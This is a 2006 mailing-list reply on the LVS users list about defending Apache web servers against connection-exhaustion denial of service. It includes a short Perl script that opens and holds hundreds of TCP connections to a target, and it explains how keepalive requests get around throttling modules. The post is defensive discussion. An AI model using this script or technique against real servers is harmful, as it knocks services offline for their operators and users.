LVS
lvs-users
Google
 
Web LinuxVirtualServer.org

Re: DoS protection strategies

To: "LinuxVirtualServer.org users mailing list." <lvs-users@xxxxxxxxxxxxxxxxxxxxxx>
Subject: Re: DoS protection strategies
From: Roberto Nibali <ratz@xxxxxxxxxxxx>
Date: Tue, 18 Apr 2006 20:41:18 +0200
Hello,

To my surprise, opening 150 tcp connections to a default apache
installation is enough to effectively DoS it for a few minutes (until
connections time out).

What is your exact setup?

Only on a really badly configured web server or maybe a 486 machine :). Otherwise this does not hold. Every web server will handle at least 1000 concurrent TCP connections easily. After that you need some ulimit or epoll tweaking.

This could be circumvented by using
mod_throttle, mod_bwshare or mod_limitipconn but imho a much better

Nope, you then just open a HTTP 1.1 channel and reload using GET / every MaxKeepAliveTimeout-1. Those modules will not help much IMHO. They only do QoS on established sockets. It's the wrong place to interfere.

place to solve this is at the LVS loadbalancer. Which already does
source IP tracking for the "persistency" feature.

Does not help either, it's not a Layer 4 issue, it's a higher layer issue. Even if it wasn't, how would source IP tracking ever help?

Did anyone implement such a feature? Considerations?

Check out HTTP 1.1 & pipelining. Read up on the timing configurations and so on.

A sample script to test your webhosting provider:

#!/usr/bin/perl
my $target = shift or die "Usage: $0 <target>\n";
use IO::Socket::INET;
for my $t (0..300) {
  print "Try $t... ";
  $cons[$t] = IO::Socket::INET->new( PeerAddr => "$target:80", Proto
=> 'tcp', Blocking => 1 )
  or die "Couldn't connect!";
        print "connected!\n";
}
print "Enter to drop connections...\n";
<STDIN>;

Besides that only poorly-configured web servers will allow you to hold a socket after a simple TCP handshake without sending any data, you get a close on the socket for HTTP 1.1 configured web servers with low timeouts.

You are right however, in that using such an approach of blocking TCP connections (_inluding_ data fetching) can tear down a lot of (even very well known) web sites. I've actually started writing a paper on this last year, however never finished it. I wrote a proof-of-concept tool that would (after some scanning and timeout guessing) block a whole web site, if not properly configured. This was done using the CURL library. It simulates some sort of slow-start slashdot-effect.

Best regards,
Roberto Nibali, ratz
--
echo '[q]sa[ln0=aln256%Pln256/snlbx]sb3135071790101768542287578439snlbxq' | dc

<Prev in Thread] Current Thread [Next in Thread>